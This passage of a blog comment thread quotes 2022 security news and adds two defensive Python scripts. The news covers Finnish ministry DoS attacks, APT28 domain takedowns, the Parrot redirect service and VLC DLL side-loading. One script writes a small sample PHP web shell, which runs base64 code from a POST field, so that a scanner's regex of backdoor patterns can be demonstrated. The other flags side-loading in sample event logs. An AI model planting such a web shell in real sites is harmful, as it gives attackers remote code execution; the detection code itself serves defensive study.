    https://www.iltalehti.fi/kotimaa/a/45797cdf-e56d-4037-bfa7-40f8a548a7ea

    The websites of the Ministry for Foreign Affairs and the Ministry of Defence went down on Friday. The Defmin.fi site is currently inaccessible.

    The Ministry for Foreign Affairs says on Twitter that its site returned to normal at 13:00.

    Cyberattack under way: Ministry of Defence and Ministry for Foreign Affairs websites went down
    https://www.hs.fi/kotimaa/art-2000008738855.html

    The Ministry of Defence tells HS that this is a denial-of-service attack currently in progress. The Ministry for Foreign Affairs website is working again.

    The websites of the Ministry for Foreign Affairs and the Ministry of Defence went down on Friday afternoon. For the Ministry for Foreign Affairs' formin.fi site the situation ended at around 13:00 and, according to the ministry, the site is working normally again.

    The Ministry of Defence's defmin.fi site is still inaccessible. The Ministry for Foreign Affairs and the Ministry of Defence confirmed to Helsingin Sanomat in the afternoon that the sites were down and the situation was being investigated.

    The source of the denial-of-service attack is not yet known, but the Finnish Security Intelligence Service (Supo) warned last week that Russia is likely to direct cyberattacks and information influence operations at Finland in the coming months.

    The attack was carried out just before Ukrainian President Volodymyr Zelensky's speech to the Finnish Parliament.

    Reply
  38. Tomi Engdahl says:

    F-Secure's Hyppönen: Attacks on Finnish ministries' websites probably of Russian origin – “A showy way of protesting online”
    https://www.mtvuutiset.fi/artikkeli/f-securen-hypponen-iskut-suomalaisten-ministerioiden-sivuille-todennakoisesti-venalaista-alkuperaa-ei-pysyvaa-vahinkoa-tama-on-nayttava-tapa-osoittaa-mielta-verkossa/8398934#gs.woxlpb

    The denial-of-service attack against the websites of the Ministry for Foreign Affairs and the Ministry of Defence was probably of Russian origin, F-Secure's chief research officer Mikko Hyppönen tells MTV Uutiset.

    According to Hyppönen, attacks of this kind do not steal data or break into systems.

    – This attack causes no permanent damage; it is a showy way of protesting online.

    In Hyppönen's assessment, the attack was deliberately timed to begin at the same time as Ukrainian President Volodymyr Zelensky was due to start his speech to the Finnish Parliament.

    The origin of the attack may never be determined.

    – One can assume, however, that this is related to the aggressive Russian offensive activity online right now. The causal link (to Zelensky's speech to the Finnish Parliament) is very easy to see.

    Reply
  39. Tomi Engdahl says:

    U.S. Says It Secretly Removed Malware Worldwide, Pre-empting Russian Cyberattacks
    https://www.nytimes.com/2022/04/06/us/politics/us-russia-malware-cyberattacks.html?referringSource=articleShare

    The operation is the latest effort by the Biden administration to thwart actions by Russia by making them public before Moscow can strike.

    The United States said on Wednesday that it had secretly removed malware from computer networks around the world in recent weeks, a step to pre-empt Russian cyberattacks and send a message to President Vladimir V. Putin of Russia.

    The move, made public by Attorney General Merrick B. Garland, comes as U.S. officials warn that Russia could try to strike American critical infrastructure — including financial firms, pipelines and the electric grid — in response to the crushing sanctions that the United States has imposed on Moscow over the war in Ukraine.

    The malware enabled the Russians to create “botnets”

    Reply
  40. Tomi Engdahl says:

    Sergiu Gatlan / BleepingComputer:
    Microsoft says it obtained a court order on April 6 to take control of seven domains and disrupt Russia-linked hacking group Strontium’s attacks against Ukraine — Microsoft has successfully disrupted attacks against Ukrainian targets coordinated by the Russian APT28 hacking group after taking …

    Microsoft takes down APT28 domains used in attacks against Ukraine
    https://www.bleepingcomputer.com/news/microsoft/microsoft-takes-down-apt28-domains-used-in-attacks-against-ukraine/

    Microsoft has successfully disrupted attacks against Ukrainian targets coordinated by the Russian APT28 hacking group after taking down seven domains used as attack infrastructure.

    Strontium (also tracked as Fancy Bear or APT28), linked to Russia’s military intelligence service GRU, used these domains to target multiple Ukrainian institutions, including media organizations.

    The domains were also used in attacks against US and EU government institutions and think tanks involved in foreign policy.

    “On Wednesday, April 6th, we obtained a court order authorizing us to take control of seven internet domains Strontium was using to conduct these attacks,” said Tom Burt, Corporate Vice President of Customer Security & Trust at Microsoft.

    “We have since re-directed these domains to a sinkhole controlled by Microsoft, enabling us to mitigate Strontium’s current use of these domains and enable victim notifications.

    Reply
  41. Tomi Engdahl says:

    Tonya Riley / CyberScoop:
    US judge sentences Denys Iarmak, a Ukrainian and member of the FIN7 hacking group, to five years in prison; FIN7 has stolen 20M+ credit card numbers since 2015 — Denys Iarmak, a high-level member of the criminal hacking group FIN7, was sentenced to five years in prison today by a U.S. judge.
    FIN7 hacker sentenced to five years
    https://www.cyberscoop.com/fin7-hacker-sentenced-denys-iarmak/

    Reply
  42. Tomi Engdahl says:

    Naomi Nix / Washington Post:
    Meta disrupts covert influence operations by Belarus- and Russia-linked actors targeting Ukrainians, like hacking Ukrainian military staff’s Facebook accounts
    https://www.washingtonpost.com/technology/2022/04/07/facebook-covert-influence-ukraine/

    Reply
  43. Tomi Engdahl says:

    Malicious web redirect service infects 16,500 sites to push malware
    https://www.bleepingcomputer.com/news/security/malicious-web-redirect-service-infects-16-500-sites-to-push-malware/

    A new traffic direction system (TDS) called Parrot is relying on servers that host 16,500 websites of universities, local governments, adult content platforms, and personal blogs.

    Parrot is used in malicious campaigns to redirect potential victims matching a specific profile (location, language, operating system, browser) to online resources such as phishing and malware-dropping sites.

    Threat actors running malicious campaigns buy TDS services to filter incoming traffic and send it to a final destination serving malicious content.

    TDS are also legitimately used by advertisers and marketers, and some of these services were exploited in the past to facilitate malspam campaigns.

    Threat actors have planted a malicious web shell on compromised servers and copied it to various locations under similar names that follow a “parroting” pattern.

    Moreover, the adversaries use a PHP backdoor script that extracts client information and forwards requests to the Parrot TDS command and control (C2) server.

    Reply
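    The two host-side artifacts described above, a web shell copied to several locations under look-alike names and a PHP backdoor that harvests client data for the TDS, are what a responder would hunt for in a compromised webroot. The script below is an added example, not code from the BleepingComputer article or from the Parrot TDS research: it hashes every PHP file under a webroot, reports byte-identical copies (the "parroting" pattern), and flags files containing backdoor-style constructs. The webroot, file names and the regex of suspicious constructs are constructed for the example and are not published Parrot TDS indicators.

    ```python
    """Hunt for duplicated web shells and backdoor-style PHP in a webroot (added example)."""
    import hashlib
    import os
    import re
    import tempfile
    from collections import defaultdict

    # Constructs typical of PHP backdoors; an assumption for this example, not Parrot IOCs.
    SUSPICIOUS = re.compile(
        rb"(eval\s*\(|base64_decode\s*\(|gzinflate\s*\(|\$_(GET|POST|REQUEST|COOKIE)\[|curl_exec\s*\()"
    )
    PHP_EXT = (".php", ".phtml", ".php5")


    def _sha256(path):
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                h.update(chunk)
        return h.hexdigest()


    def scan_webroot(root):
        """Return (duplicates, suspicious).

        duplicates: content hash -> sorted list of paths, only for content found in >1 place
        suspicious: sorted list of PHP files containing backdoor-style constructs
        """
        by_hash = defaultdict(list)
        suspicious = []
        for dirpath, _, files in os.walk(root):
            for name in files:
                if not name.lower().endswith(PHP_EXT):
                    continue
                path = os.path.join(dirpath, name)
                by_hash[_sha256(path)].append(path)
                with open(path, "rb") as f:
                    if SUSPICIOUS.search(f.read()):
                        suspicious.append(path)
        duplicates = {h: sorted(p) for h, p in by_hash.items() if len(p) > 1}
        return duplicates, sorted(suspicious)


    def build_sample_webroot():
        """Constructed sample webroot: one clean plugin file plus one backdoor copied
        to three locations under WordPress-looking names. Not real Parrot TDS code."""
        root = tempfile.mkdtemp(prefix="webroot_")
        clean = b"<?php\nfunction hello() { return 'hi'; }\n"
        shell = (
            b"<?php\n"
            b"$c = $_POST['c'] ?? '';\n"
            b"if ($c !== '') { eval(base64_decode($c)); }\n"
            b"$p = http_build_query(['ua' => $_SERVER['HTTP_USER_AGENT'] ?? '',\n"
            b"                       'ip' => $_SERVER['REMOTE_ADDR'] ?? '']);\n"
        )
        layout = {
            "wp-content/plugins/demo/demo.php": clean,
            "wp-content/uploads/wp-config-sample.php": shell,
            "wp-admin/includes/class-wp-config-sample.php": shell,
            "wp-includes/wp-config-samplex.php": shell,
        }
        for rel, body in layout.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as f:
                f.write(body)
        return root


    if __name__ == "__main__":
        root = build_sample_webroot()
        dups, sus = scan_webroot(root)
        for h, paths in dups.items():
            print(f"identical content {h[:12]}... found in {len(paths)} places:")
            for p in paths:
                print("   ", os.path.relpath(p, root))
        print("backdoor-style constructs in:", [os.path.relpath(p, root) for p in sus])
    ```

    Run it against a real document root instead of the constructed one by calling scan_webroot("/var/www/html"); the duplicate report is the more reliable of the two signals, since a hash match needs no knowledge of the shell's code, while the regex will also hit some legitimate plugins and must be triaged.
    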
  44. Tomi Engdahl says:

    Everyone’s favorite media player abused to launch malware attacks
    By Sead Fadilpašić published 2 days ago
    Chinese threat actors are abusing VLC
    https://www.techradar.com/news/everyones-favorite-media-player-abused-to-launch-malware-attacks

    Cybercriminals are using the popular VLC media player to distribute malware and spy on government agencies and adjacent organizations, cybersecurity researchers have warned.

    As reported by BleepingComputer, a threat actor called Cicada (also known as Stone Panda and APT10) is targeting organizations in the government, legal, and NGO sectors, as well as some engaged in “religious activities”.

    Speaking to Bleeping Computer, Brigid O Gorman of Symantec said the attackers “side-loaded” the malware, using a clean version of VLC with a malicious DLL file in the same path as the media player’s export functions

    Reply
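    The side-loading technique above (a clean, signed VLC binary dropped next to a malicious DLL that carries the names the player expects) is hard to catch by looking at the executable alone, because the executable really is VLC. What stands out in endpoint telemetry is the combination: a trusted binary running from a user-writable path and loading an unsigned DLL from its own directory. The script below is an added example, not code from Symantec, BleepingComputer or the VLC project; it runs three such checks over constructed Sysmon-style "Image loaded" (Event ID 7) records. The event records, the expected-DLL list for vlc.exe and the list of user-writable directories are assumptions made for the example, not real telemetry from the Cicada campaign.

    ```python
    """Flag DLL side-loading candidates in Sysmon-style Event ID 7 records (added example)."""
    from pathlib import PureWindowsPath

    # DLLs the sample app legitimately ships beside its executable. Constructed for
    # this example; not VLC's real dependency list.
    EXPECTED_APP_DLLS = {"vlc.exe": {"libvlc.dll", "libvlccore.dll"}}

    # Path fragments that mark user-writable locations a signed app should not run from.
    USER_WRITABLE_MARKERS = (
        "\\appdata\\local\\temp\\", "\\downloads\\", "\\programdata\\", "\\users\\public\\",
    )

    # Constructed Sysmon-style events. Events 1-2 are benign, 3-4 are side-loading candidates.
    SAMPLE_EVENTS = [
        {"EventID": 7, "Image": r"C:\Program Files\VideoLAN\VLC\vlc.exe",
         "ImageLoaded": r"C:\Program Files\VideoLAN\VLC\libvlc.dll",
         "Signed": "true", "Signature": "VideoLAN", "SignatureStatus": "Valid"},
        {"EventID": 7, "Image": r"C:\Program Files\VideoLAN\VLC\vlc.exe",
         "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
         "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
        {"EventID": 7, "Image": r"C:\Users\alice\AppData\Local\Temp\vlc.exe",
         "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\libvlc.dll",
         "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
        {"EventID": 7, "Image": r"C:\ProgramData\update\vlc.exe",
         "ImageLoaded": r"C:\ProgramData\update\wininet.dll",
         "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
        {"EventID": 1, "Image": r"C:\Windows\explorer.exe"},
    ]


    def _dir(path):
        return str(PureWindowsPath(path).parent).lower()


    def _name(path):
        return PureWindowsPath(path).name.lower()


    def find_sideload_candidates(events):
        """Return a list of {image, dll, reasons} for image-load events that look like
        DLL side-loading. Events other than ID 7 are ignored."""
        findings = []
        for ev in events:
            if ev.get("EventID") != 7:
                continue
            image, dll = ev["Image"], ev["ImageLoaded"]
            exe = _name(image)
            same_dir = _dir(image) == _dir(dll)
            signed_ok = ev.get("Signed") == "true" and ev.get("SignatureStatus") == "Valid"
            reasons = []
            # 1. A DLL that is not part of the app's own set sitting beside the executable
            #    (the classic search-order hijack of a system DLL name).
            if same_dir and _name(dll) not in EXPECTED_APP_DLLS.get(exe, set()):
                reasons.append("unexpected DLL loaded from the executable's own directory")
            # 2. The app-local DLL is not validly signed, even if the name is expected.
            if same_dir and not signed_ok:
                reasons.append("unsigned or invalid-signature DLL loaded from the executable's directory")
            # 3. The (clean) executable itself runs from a user-writable location.
            if any(m in image.lower() for m in USER_WRITABLE_MARKERS):
                reasons.append("executable running from a user-writable path")
            if reasons:
                findings.append({"image": image, "dll": dll, "reasons": reasons})
        return findings


    if __name__ == "__main__":
        for f in find_sideload_candidates(SAMPLE_EVENTS):
            print(f["image"], "->", f["dll"])
            for r in f["reasons"]:
                print("   -", r)
    ```

    Check 2 on its own will also fire for legitimately unsigned third-party DLLs, so in practice it is the overlap of two or three reasons on one process that is worth an alert; the constructed Temp and ProgramData events each trigger at least two.
    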
  45. Tomi Engdahl says:

    Security expert on the cyberattack: As if someone had scribbled on a notice board https://www.is.fi/digitoday/art-2000008740603.html

    Reply
  46. Tomi Engdahl says:

    Google Bans Apps With Hidden Data-Harvesting Software
    Code placed in consumer-facing apps is tied to U.S. national-security contractors, documents show
    https://www.wsj.com/articles/apps-with-hidden-data-harvesting-software-are-banned-by-google-11649261181

    Google has yanked dozens of apps from its Google Play store after determining that they include a software element that surreptitiously harvests data.

    The Panamanian company that wrote the code, Measurement Systems S. de R.L., is linked through corporate records and web registrations to a Virginia defense contractor that does cyberintelligence, network-defense and intelligence-intercept work for U.S. national-security agencies.

    Reply
